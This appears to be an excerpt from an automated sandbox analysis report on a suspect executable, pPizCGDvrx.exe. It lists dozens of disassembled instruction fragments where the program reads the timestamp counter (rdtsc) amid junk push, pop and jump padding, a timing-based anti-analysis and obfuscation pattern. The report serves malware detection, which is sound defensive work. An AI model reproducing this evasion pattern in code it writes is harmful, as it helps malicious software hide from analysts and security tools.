                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E3196C second address: E3198B instructions: 0x00000000 rdtsc 0x00000002 js 00007F2A2CEBE356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F2A2CEBE365h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E3198B second address: E319B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2A2C619161h 0x0000000c jmp 00007F2A2C61915Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E31C6F second address: E31C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2A2CEBE35Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E31F93 second address: E31F99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E31F99 second address: E31FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2CEBE369h 0x00000009 jmp 00007F2A2CEBE35Eh 0x0000000e popad 0x0000000f jmp 00007F2A2CEBE362h 0x00000014 pop edx 0x00000015 pushad 0x00000016 push edi 0x00000017 jnl 00007F2A2CEBE356h 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 push esi 0x00000021 pop esi 0x00000022 jmp 00007F2A2CEBE35Ah 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E31FEF second address: E31FF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E38E53 second address: E38E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2A2CEBE358h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E38E5F second address: E38E64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E38E64 second address: E38E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E38E6F second address: E38E73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E392E8 second address: E392EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E392EE second address: E392F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E392F2 second address: E39317 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE361h 0x00000007 jl 00007F2A2CEBE356h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F2A2CEBE356h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E39629 second address: E39641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A2C619164h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E39641 second address: E3966B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F2A2CEBE366h 0x00000014 jmp 00007F2A2CEBE35Ah 0x00000019 jnl 00007F2A2CEBE356h 0x0000001f push eax 0x00000020 pushad 0x00000021 popad 0x00000022 push edi 0x00000023 pop edi 0x00000024 pop eax 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E3966B second address: E39670 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E397B3 second address: E397C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jg 00007F2A2CEBE356h 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E397C0 second address: E397C5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E39B98 second address: E39BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E39BA2 second address: E39BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E39BAB second address: E39BD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2A2CEBE35Fh 0x0000000c jmp 00007F2A2CEBE360h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E3A969 second address: E3A96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E38897 second address: E388B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jns 00007F2A2CEBE358h 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007F2A2CEBE356h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E388B0 second address: E388C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C61915Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E427F7 second address: E42812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE366h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E4221B second address: E4224E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C61915Bh 0x00000007 jmp 00007F2A2C61915Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jg 00007F2A2C619162h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E4224E second address: E42276 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jbe 00007F2A2CEBE356h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007F2A2CEBE35Ch 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 jc 00007F2A2CEBE356h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E42276 second address: E4227A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E4227A second address: E4227E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E4227E second address: E4228C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F2A2C61915Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E4F5B6 second address: E4F5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2CEBE35Ch 0x00000009 jmp 00007F2A2CEBE35Eh 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E4F5D5 second address: E4F5EE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F2A2C619164h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E4F21B second address: E4F21F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E4F21F second address: E4F228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E4F228 second address: E4F22E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E541B9 second address: E541BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E541BD second address: E541D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007F2A2CEBE35Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E541D1 second address: E541FB instructions: 0x00000000 rdtsc 0x00000002 js 00007F2A2C61915Ah 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d jno 00007F2A2C619156h 0x00000013 jl 00007F2A2C619156h 0x00000019 jnp 00007F2A2C619156h 0x0000001f popad 0x00000020 pop edx 0x00000021 pop eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 push edx 0x00000029 pop edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E541FB second address: E54208 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2A2CEBE356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E54208 second address: E5420E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E5420E second address: E5421D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2CEBE35Ah 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E5FFEF second address: E5FFF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E5FFF3 second address: E60003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jo 00007F2A2CEBE356h 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E61DFE second address: E61E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E61E04 second address: E61E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2A2CEBE368h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E6A4D6 second address: E6A4E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E6A8D2 second address: E6A8D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E70D3F second address: E70D45 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E70D45 second address: E70D4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E7DD71 second address: E7DDA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2A2C61915Ah 0x00000011 push eax 0x00000012 jmp 00007F2A2C619166h 0x00000017 pushad 0x00000018 popad 0x00000019 pop eax 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E8C8FE second address: E8C908 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2A2CEBE356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E8C908 second address: E8C92C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F2A2C619156h 0x00000009 jmp 00007F2A2C619165h 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E90FEF second address: E91020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2A2CEBE362h 0x0000000b jmp 00007F2A2CEBE364h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E91020 second address: E91024 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E91024 second address: E9104A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2CEBE367h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E9104A second address: E91054 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2A2C619156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E91054 second address: E9105A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E9105A second address: E9105E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E9105E second address: E9106E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F2A2CEBE356h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E93E52 second address: E93E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E93E5A second address: E93E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E939B1 second address: E939DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C619162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a js 00007F2A2C61916Eh 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E939DA second address: E939DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E93B1C second address: E93B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2A2C619169h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E93B3F second address: E93B5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE366h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E93B5F second address: E93B69 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2A2C61915Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA8042 second address: EA8048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA8048 second address: EA804C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA804C second address: EA8058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA8058 second address: EA805C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA805C second address: EA8060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA8465 second address: EA8471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2A2C619156h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA8471 second address: EA847C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA877C second address: EA87A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C61915Eh 0x00000007 jnc 00007F2A2C619156h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F2A2C619164h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA87A8 second address: EA87C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE361h 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA87C0 second address: EA87D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2C61915Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA87D7 second address: EA87F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F2A2CEBE360h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA8AA0 second address: EA8AA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EAA86D second address: EAA89C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2CEBE369h 0x00000009 pop edi 0x0000000a pushad 0x0000000b jmp 00007F2A2CEBE35Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EB002F second address: EB0033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EB0033 second address: EB003D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2A2CEBE356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EB003D second address: EB004C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EB00F6 second address: EB0116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 add dh, 00000017h 0x0000000b push 00000004h 0x0000000d jne 00007F2A2CEBE359h 0x00000013 push D7202DDCh 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EB0116 second address: EB011B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EB011B second address: EB0121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EB0121 second address: EB0125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EB0360 second address: EB03C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE35Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F2A2CEBE358h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 add dword ptr [ebp+122D264Dh], ecx 0x00000019 push dword ptr [ebp+122D1FE0h] 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F2A2CEBE358h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 or dword ptr [ebp+124558B7h], edx 0x0000003f call 00007F2A2CEBE359h 0x00000044 push eax 0x00000045 push edx 0x00000046 push edx 0x00000047 jmp 00007F2A2CEBE35Bh 0x0000004c pop edx 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EB1873 second address: EB1888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2A2C61915Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EB1888 second address: EB188C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC9EAC second address: DC9EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC9EB3 second address: DC9EB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
